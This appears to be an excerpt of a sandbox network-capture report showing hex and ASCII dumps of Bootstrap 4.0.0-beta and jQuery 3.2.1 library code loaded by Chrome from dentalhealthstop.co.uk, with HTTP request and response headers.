                                                                                                                                      2024-04-24 10:13:27 UTC436INData Raw: 37 63 30 66 0d 0a 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 2d 62 65 74 61 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 37 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 0a 69 66 28 22 75 6e 64 65 66 69
                                                                                                                                      Data Ascii: 7c0f/*! * Bootstrap v4.0.0-beta (https://getbootstrap.com) * Copyright 2011-2017 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */if("undefi
                                                                                                                                      2024-04-24 10:13:27 UTC1369INData Raw: 30 5d 2e 73 70 6c 69 74 28 22 2e 22 29 3b 69 66 28 65 5b 30 5d 3c 32 26 26 65 5b 31 5d 3c 39 7c 7c 31 3d 3d 65 5b 30 5d 26 26 39 3d 3d 65 5b 31 5d 26 26 65 5b 32 5d 3c 31 7c 7c 65 5b 30 5d 3e 3d 34 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 42 6f 6f 74 73 74 72 61 70 27 73 20 4a 61 76 61 53 63 72 69 70 74 20 72 65 71 75 69 72 65 73 20 61 74 20 6c 65 61 73 74 20 6a 51 75 65 72 79 20 76 31 2e 39 2e 31 20 62 75 74 20 6c 65 73 73 20 74 68 61 6e 20 76 34 2e 30 2e 30 22 29 7d 28 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 2c 65 29 7b 69 66 28 21 74 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c 69 73 65 64 20 2d 20
                                                                                                                                      Data Ascii: 0].split(".");if(e[0]<2&&e[1]<9||1==e[0]&&9==e[1]&&e[2]<1||e[0]>=4)throw new Error("Bootstrap's JavaScript requires at least jQuery v1.9.1 but less than v4.0.0")}(),function(){function t(t,e){if(!t)throw new ReferenceError("this hasn't been initialised -
                                                                                                                                      2024-04-24 10:13:27 UTC1369INData Raw: 64 65 6c 65 67 61 74 65 54 79 70 65 3a 73 2e 65 6e 64 2c 68 61 6e 64 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 74 28 65 2e 74 61 72 67 65 74 29 2e 69 73 28 74 68 69 73 29 29 72 65 74 75 72 6e 20 65 2e 68 61 6e 64 6c 65 4f 62 6a 2e 68 61 6e 64 6c 65 72 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 29 7b 69 66 28 77 69 6e 64 6f 77 2e 51 55 6e 69 74 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 62 6f 6f 74 73 74 72 61 70 22 29 3b 66 6f 72 28 76 61 72 20 65 20 69 6e 20 61 29 69 66 28 76 6f 69 64 20 30 21 3d 3d 74 2e 73 74 79 6c 65 5b 65 5d 29 72 65 74 75 72 6e 7b 65 6e 64 3a 61 5b 65 5d 7d 3b 72 65 74 75 72 6e 21
                                                                                                                                      Data Ascii: delegateType:s.end,handle:function(e){if(t(e.target).is(this))return e.handleObj.handler.apply(this,arguments)}}}function o(){if(window.QUnit)return!1;var t=document.createElement("bootstrap");for(var e in a)if(void 0!==t.style[e])return{end:a[e]};return!
                                                                                                                                      2024-04-24 10:13:27 UTC1369INData Raw: 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 22 61 6c 65 72 74 22 2c 69 3d 74 2e 66 6e 5b 65 5d 2c 73 3d 7b 44 49 53 4d 49 53 53 3a 27 5b 64 61 74 61 2d 64 69 73 6d 69 73 73 3d 22 61 6c 65 72 74 22 5d 27 7d 2c 61 3d 7b 43 4c 4f 53 45 3a 22 63 6c 6f 73 65 2e 62 73 2e 61 6c 65 72 74 22 2c 43 4c 4f 53 45 44 3a 22 63 6c 6f 73 65 64 2e 62 73 2e 61 6c 65 72 74 22 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 2e 62 73 2e 61 6c 65 72 74 2e 64 61 74 61 2d 61 70 69 22 7d 2c 6c 3d 7b 41 4c 45 52 54 3a 22 61 6c 65 72 74 22 2c 46 41 44 45 3a 22 66 61 64 65 22 2c 53 48 4f 57 3a 22 73 68 6f 77 22 7d 2c 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 6e 28 74 68 69 73 2c 65 29 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 74
                                                                                                                                      Data Ascii: ion(t){var e="alert",i=t.fn[e],s={DISMISS:'[data-dismiss="alert"]'},a={CLOSE:"close.bs.alert",CLOSED:"closed.bs.alert",CLICK_DATA_API:"click.bs.alert.data-api"},l={ALERT:"alert",FADE:"fade",SHOW:"show"},h=function(){function e(t){n(this,e),this._element=t
                                                                                                                                      2024-04-24 10:13:27 UTC1369INData Raw: 7d 7d 5d 29 2c 65 7d 28 29 3b 74 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 61 2e 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 2c 73 2e 44 49 53 4d 49 53 53 2c 68 2e 5f 68 61 6e 64 6c 65 44 69 73 6d 69 73 73 28 6e 65 77 20 68 29 29 2c 74 2e 66 6e 5b 65 5d 3d 68 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 74 2e 66 6e 5b 65 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 68 2c 74 2e 66 6e 5b 65 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 66 6e 5b 65 5d 3d 69 2c 68 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 7d 28 6a 51 75 65 72 79 29 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 22 62 75 74 74 6f 6e 22 2c 69 3d 74 2e 66 6e 5b 65 5d 2c 72 3d 7b 41 43 54 49 56 45 3a 22 61 63 74 69 76
                                                                                                                                      Data Ascii: }}]),e}();t(document).on(a.CLICK_DATA_API,s.DISMISS,h._handleDismiss(new h)),t.fn[e]=h._jQueryInterface,t.fn[e].Constructor=h,t.fn[e].noConflict=function(){return t.fn[e]=i,h._jQueryInterface}}(jQuery),function(t){var e="button",i=t.fn[e],r={ACTIVE:"activ
                                                                                                                                      2024-04-24 10:13:27 UTC1369INData Raw: 74 69 6f 6e 28 29 7b 76 61 72 20 69 3d 74 28 74 68 69 73 29 2e 64 61 74 61 28 22 62 73 2e 62 75 74 74 6f 6e 22 29 3b 69 7c 7c 28 69 3d 6e 65 77 20 65 28 74 68 69 73 29 2c 74 28 74 68 69 73 29 2e 64 61 74 61 28 22 62 73 2e 62 75 74 74 6f 6e 22 2c 69 29 29 2c 22 74 6f 67 67 6c 65 22 3d 3d 3d 6e 26 26 69 5b 6e 5d 28 29 7d 29 7d 2c 6f 28 65 2c 6e 75 6c 6c 2c 5b 7b 6b 65 79 3a 22 56 45 52 53 49 4f 4e 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 34 2e 30 2e 30 2d 62 65 74 61 22 7d 7d 5d 29 2c 65 7d 28 29 3b 74 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 61 2e 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 2c 73 2e 44 41 54 41 5f 54 4f 47 47 4c 45 5f 43 41 52 52 4f 54 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 70 72 65 76 65 6e 74 44 65 66
                                                                                                                                      Data Ascii: tion(){var i=t(this).data("bs.button");i||(i=new e(this),t(this).data("bs.button",i)),"toggle"===n&&i[n]()})},o(e,null,[{key:"VERSION",get:function(){return"4.0.0-beta"}}]),e}();t(document).on(a.CLICK_DATA_API,s.DATA_TOGGLE_CARROT,function(e){e.preventDef
                                                                                                                                      2024-04-24 10:13:27 UTC1369INData Raw: 2e 61 63 74 69 76 65 2e 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 22 2c 49 54 45 4d 3a 22 2e 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 22 2c 4e 45 58 54 5f 50 52 45 56 3a 22 2e 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6e 65 78 74 2c 20 2e 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 70 72 65 76 22 2c 49 4e 44 49 43 41 54 4f 52 53 3a 22 2e 63 61 72 6f 75 73 65 6c 2d 69 6e 64 69 63 61 74 6f 72 73 22 2c 44 41 54 41 5f 53 4c 49 44 45 3a 22 5b 64 61 74 61 2d 73 6c 69 64 65 5d 2c 20 5b 64 61 74 61 2d 73 6c 69 64 65 2d 74 6f 5d 22 2c 44 41 54 41 5f 52 49 44 45 3a 27 5b 64 61 74 61 2d 72 69 64 65 3d 22 63 61 72 6f 75 73 65 6c 22 5d 27 7d 2c 5f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 69 29 7b 6e 28 74 68 69 73 2c 6c 29 2c 74 68 69 73 2e
                                                                                                                                      Data Ascii: .active.carousel-item",ITEM:".carousel-item",NEXT_PREV:".carousel-item-next, .carousel-item-prev",INDICATORS:".carousel-indicators",DATA_SLIDE:"[data-slide], [data-slide-to]",DATA_RIDE:'[data-ride="carousel"]'},_=function(){function l(e,i){n(this,l),this.
                                                                                                                                      2024-04-24 10:13:27 UTC1369INData Raw: 6d 65 6e 74 29 3b 69 66 28 21 28 65 3e 74 68 69 73 2e 5f 69 74 65 6d 73 2e 6c 65 6e 67 74 68 2d 31 7c 7c 65 3c 30 29 29 69 66 28 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 29 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 65 28 64 2e 53 4c 49 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 2e 74 6f 28 65 29 7d 29 3b 65 6c 73 65 7b 69 66 28 69 3d 3d 3d 65 29 72 65 74 75 72 6e 20 74 68 69 73 2e 70 61 75 73 65 28 29 2c 76 6f 69 64 20 74 68 69 73 2e 63 79 63 6c 65 28 29 3b 76 61 72 20 6f 3d 65 3e 69 3f 75 2e 4e 45 58 54 3a 75 2e 50 52 45 56 3b 74 68 69 73 2e 5f 73 6c 69 64 65 28 6f 2c 74 68 69 73 2e 5f 69 74 65 6d 73 5b 65 5d 29 7d 7d 2c 6c 2e 70 72 6f 74 6f 74 79 70 65 2e 64 69 73 70 6f 73 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74
                                                                                                                                      Data Ascii: ment);if(!(e>this._items.length-1||e<0))if(this._isSliding)t(this._element).one(d.SLID,function(){return n.to(e)});else{if(i===e)return this.pause(),void this.cycle();var o=e>i?u.NEXT:u.PREV;this._slide(o,this._items[e])}},l.prototype.dispose=function(){t
                                                                                                                                      2024-04-24 10:13:27 UTC1369INData Raw: 54 45 4d 29 29 2c 74 68 69 73 2e 5f 69 74 65 6d 73 2e 69 6e 64 65 78 4f 66 28 65 29 7d 2c 6c 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 67 65 74 49 74 65 6d 42 79 44 69 72 65 63 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 74 3d 3d 3d 75 2e 4e 45 58 54 2c 69 3d 74 3d 3d 3d 75 2e 50 52 45 56 2c 6f 3d 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 65 29 2c 72 3d 74 68 69 73 2e 5f 69 74 65 6d 73 2e 6c 65 6e 67 74 68 2d 31 3b 69 66 28 28 69 26 26 30 3d 3d 3d 6f 7c 7c 6e 26 26 6f 3d 3d 3d 72 29 26 26 21 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 77 72 61 70 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 73 3d 28 6f 2b 28 74 3d 3d 3d 75 2e 50 52 45 56 3f 2d 31 3a 31 29 29 25 74 68 69 73 2e 5f 69 74 65 6d 73 2e 6c 65 6e 67 74 68 3b 72 65
                                                                                                                                      Data Ascii: TEM)),this._items.indexOf(e)},l.prototype._getItemByDirection=function(t,e){var n=t===u.NEXT,i=t===u.PREV,o=this._getItemIndex(e),r=this._items.length-1;if((i&&0===o||n&&o===r)&&!this._config.wrap)return e;var s=(o+(t===u.PREV?-1:1))%this._items.length;re
                                                                                                                                      2024-04-24 10:13:27 UTC1369INData Raw: 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 66 2e 53 4c 49 44 45 29 3f 28 74 28 61 29 2e 61 64 64 43 6c 61 73 73 28 5f 29 2c 72 2e 72 65 66 6c 6f 77 28 61 29 2c 74 28 6f 29 2e 61 64 64 43 6c 61 73 73 28 63 29 2c 74 28 61 29 2e 61 64 64 43 6c 61 73 73 28 63 29 2c 74 28 6f 29 2e 6f 6e 65 28 72 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 61 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 63 2b 22 20 22 2b 5f 29 2e 61 64 64 43 6c 61 73 73 28 66 2e 41 43 54 49 56 45 29 2c 74 28 6f 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 66 2e 41 43 54 49 56 45 2b 22 20 22 2b 5f 2b 22 20 22 2b 63 29 2c 69 2e 5f 69 73 53 6c 69 64 69 6e 67 3d 21 31 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 28 69
                                                                                                                                      Data Ascii: nt).hasClass(f.SLIDE)?(t(a).addClass(_),r.reflow(a),t(o).addClass(c),t(a).addClass(c),t(o).one(r.TRANSITION_END,function(){t(a).removeClass(c+" "+_).addClass(f.ACTIVE),t(o).removeClass(f.ACTIVE+" "+_+" "+c),i._isSliding=!1,setTimeout(function(){return t(i


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      51192.168.2.1649774151.101.2.1374437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:27 UTC582OUTGET /jquery-3.2.1.slim.min.js HTTP/1.1
                                                                                                                                      Host: code.jquery.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      Origin: https://dentalhealthstop.co.uk
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://dentalhealthstop.co.uk/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:27 UTC567INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      Content-Length: 69597
                                                                                                                                      Server: nginx
                                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                                      Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                      ETag: "28feccc0-10fdd"
                                                                                                                                      Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Age: 1423740
                                                                                                                                      Date: Wed, 24 Apr 2024 10:13:27 GMT
                                                                                                                                      X-Served-By: cache-lga21963-LGA, cache-bur-kbur8200128-BUR
                                                                                                                                      X-Cache: HIT, HIT
                                                                                                                                      X-Cache-Hits: 23, 0
                                                                                                                                      X-Timer: S1713953608.886239,VS0,VE1
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      2024-04-24 10:13:27 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 32 2e 31 20 2d 61 6a 61 78 2c 2d 61 6a 61 78 2f 6a 73 6f 6e 70 2c 2d 61 6a 61 78 2f 6c 6f 61 64 2c 2d 61 6a 61 78 2f 70 61 72 73 65 58 4d 4c 2c 2d 61 6a 61 78 2f 73 63 72 69 70 74 2c 2d 61 6a 61 78 2f 76 61 72 2f 6c 6f 63 61 74 69 6f 6e 2c 2d 61 6a 61 78 2f 76 61 72 2f 6e 6f 6e 63 65 2c 2d 61 6a 61 78 2f 76 61 72 2f 72 71 75 65 72 79 2c 2d 61 6a 61 78 2f 78 68 72 2c 2d 6d 61 6e 69 70 75 6c 61 74 69 6f 6e 2f 5f 65 76 61 6c 55 72 6c 2c 2d 65 76 65 6e 74 2f 61 6a 61 78 2c 2d 65 66 66 65 63 74 73 2c 2d 65 66 66 65 63 74 73 2f 54 77 65 65 6e 2c 2d 65 66 66 65 63 74 73 2f 61 6e 69 6d 61 74 65 64 53 65 6c 65 63 74 6f 72 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e
                                                                                                                                      Data Ascii: /*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other con
                                                                                                                                      2024-04-24 10:13:27 UTC1378INData Raw: 5b 61 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 72 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 61 29 3b 72 65 74 75 72 6e 20 62 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 62 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 72 2e 65 61 63 68 28 74 68 69 73 2c 61 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 72 2e 6d 61 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 20 61 2e 63 61 6c 6c 28 62 2c 63 2c 62 29 7d 29 29 7d 2c 73 6c 69 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61
                                                                                                                                      Data Ascii: [a]},pushStack:function(a){var b=r.merge(this.constructor(),a);return b.prevObject=this,b},each:function(a){return r.each(this,a)},map:function(a){return this.pushStack(r.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushSta
                                                                                                                                      2024-04-24 10:13:27 UTC1378INData Raw: 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6b 2e 63 61 6c 6c 28 61 29 29 26 26 28 21 28 62 3d 65 28 61 29 29 7c 7c 28 63 3d 6c 2e 63 61 6c 6c 28 62 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 62 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 63 26 26 6d 2e 63 61 6c 6c 28 63 29 3d 3d 3d 6e 29 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3b 66 6f 72 28 62 20 69 6e 20 61 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 74 79 70 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 61 3f 61 2b 22 22 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 61 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70
                                                                                                                                      Data Ascii: ject Object]"!==k.call(a))&&(!(b=e(a))||(c=l.call(b,"constructor")&&b.constructor,"function"==typeof c&&m.call(c)===n))},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typ
                                                                                                                                      2024-04-24 10:13:27 UTC1378INData Raw: 6e 6f 77 2c 73 75 70 70 6f 72 74 3a 6f 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 28 72 2e 66 6e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 63 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 29 2c 72 2e 65 61 63 68 28 22 42 6f 6f 6c 65 61 6e 20 4e 75 6d 62 65 72 20 53 74 72 69 6e 67 20 46 75 6e 63 74 69 6f 6e 20 41 72 72 61 79 20 44 61 74 65 20 52 65 67 45 78 70 20 4f 62 6a 65 63 74 20 45 72 72 6f 72 20 53 79 6d 62 6f 6c 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 6a 5b 22 5b 6f 62 6a 65 63 74 20 22 2b 62 2b 22 5d 22 5d 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 77 28 61 29 7b 76 61 72 20 62 3d 21 21 61 26 26 22 6c 65
                                                                                                                                      Data Ascii: now,support:o}),"function"==typeof Symbol&&(r.fn[Symbol.iterator]=c[Symbol.iterator]),r.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(a,b){j["[object "+b+"]"]=b.toLowerCase()});function w(a){var b=!!a&&"le
                                                                                                                                      2024-04-24 10:13:27 UTC1378INData Raw: 22 29 22 29 2c 43 4c 41 53 53 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 5c 5c 2e 28 22 2b 4c 2b 22 29 22 29 2c 54 41 47 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 2b 4c 2b 22 7c 5b 2a 5d 29 22 29 2c 41 54 54 52 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 29 2c 50 53 45 55 44 4f 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4e 29 2c 43 48 49 4c 44 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 3a 28 6f 6e 6c 79 7c 66 69 72 73 74 7c 6c 61 73 74 7c 6e 74 68 7c 6e 74 68 2d 6c 61 73 74 29 2d 28 63 68 69 6c 64 7c 6f 66 2d 74 79 70 65 29 28 3f 3a 5c 5c 28 22 2b 4b 2b 22 2a 28 65 76 65 6e 7c 6f 64 64 7c 28 28 5b 2b 2d 5d 7c 29 28 5c 5c 64 2a 29 6e 7c 29 22 2b 4b 2b 22 2a 28 3f 3a 28 5b 2b 2d 5d 7c 29 22 2b 4b 2b 22 2a 28 5c 5c 64 2b 29 7c 29 29 22 2b 4b
                                                                                                                                      Data Ascii: ")"),CLASS:new RegExp("^\\.("+L+")"),TAG:new RegExp("^("+L+"|[*])"),ATTR:new RegExp("^"+M),PSEUDO:new RegExp("^"+N),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+K+"*(even|odd|(([+-]|)(\\d*)n|)"+K+"*(?:([+-]|)"+K+"*(\\d+)|))"+K
                                                                                                                                      2024-04-24 10:13:27 UTC1378INData Raw: 3d 3d 77 26 26 31 31 21 3d 3d 77 29 72 65 74 75 72 6e 20 64 3b 69 66 28 21 65 26 26 28 28 62 3f 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 3a 76 29 21 3d 3d 6e 26 26 6d 28 62 29 2c 62 3d 62 7c 7c 6e 2c 70 29 29 7b 69 66 28 31 31 21 3d 3d 77 26 26 28 6c 3d 5a 2e 65 78 65 63 28 61 29 29 29 69 66 28 66 3d 6c 5b 31 5d 29 7b 69 66 28 39 3d 3d 3d 77 29 7b 69 66 28 21 28 6a 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 66 29 29 29 72 65 74 75 72 6e 20 64 3b 69 66 28 6a 2e 69 64 3d 3d 3d 66 29 72 65 74 75 72 6e 20 64 2e 70 75 73 68 28 6a 29 2c 64 7d 65 6c 73 65 20 69 66 28 73 26 26 28 6a 3d 73 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 66 29 29 26 26 74 28 62 2c 6a 29 26 26 6a 2e 69 64 3d 3d 3d 66 29 72 65 74 75 72 6e 20 64 2e 70 75 73 68
                                                                                                                                      Data Ascii: ==w&&11!==w)return d;if(!e&&((b?b.ownerDocument||b:v)!==n&&m(b),b=b||n,p)){if(11!==w&&(l=Z.exec(a)))if(f=l[1]){if(9===w){if(!(j=b.getElementById(f)))return d;if(j.id===f)return d.push(j),d}else if(s&&(j=s.getElementById(f))&&t(b,j)&&j.id===f)return d.push
                                                                                                                                      2024-04-24 10:13:27 UTC1378INData Raw: 20 6d 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 22 69 6e 70 75 74 22 3d 3d 3d 63 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6e 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 28 22 69 6e 70 75 74 22 3d 3d 3d 63 7c 7c 22 62 75 74 74 6f 6e 22 3d 3d 3d 63 29 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 22 66 6f 72 6d 22 69 6e 20 62 3f 62 2e 70 61
                                                                                                                                      Data Ascii: ma(a){return function(b){var c=b.nodeName.toLowerCase();return"input"===c&&b.type===a}}function na(a){return function(b){var c=b.nodeName.toLowerCase();return("input"===c||"button"===c)&&b.type===a}}function oa(a){return function(b){return"form"in b?b.pa
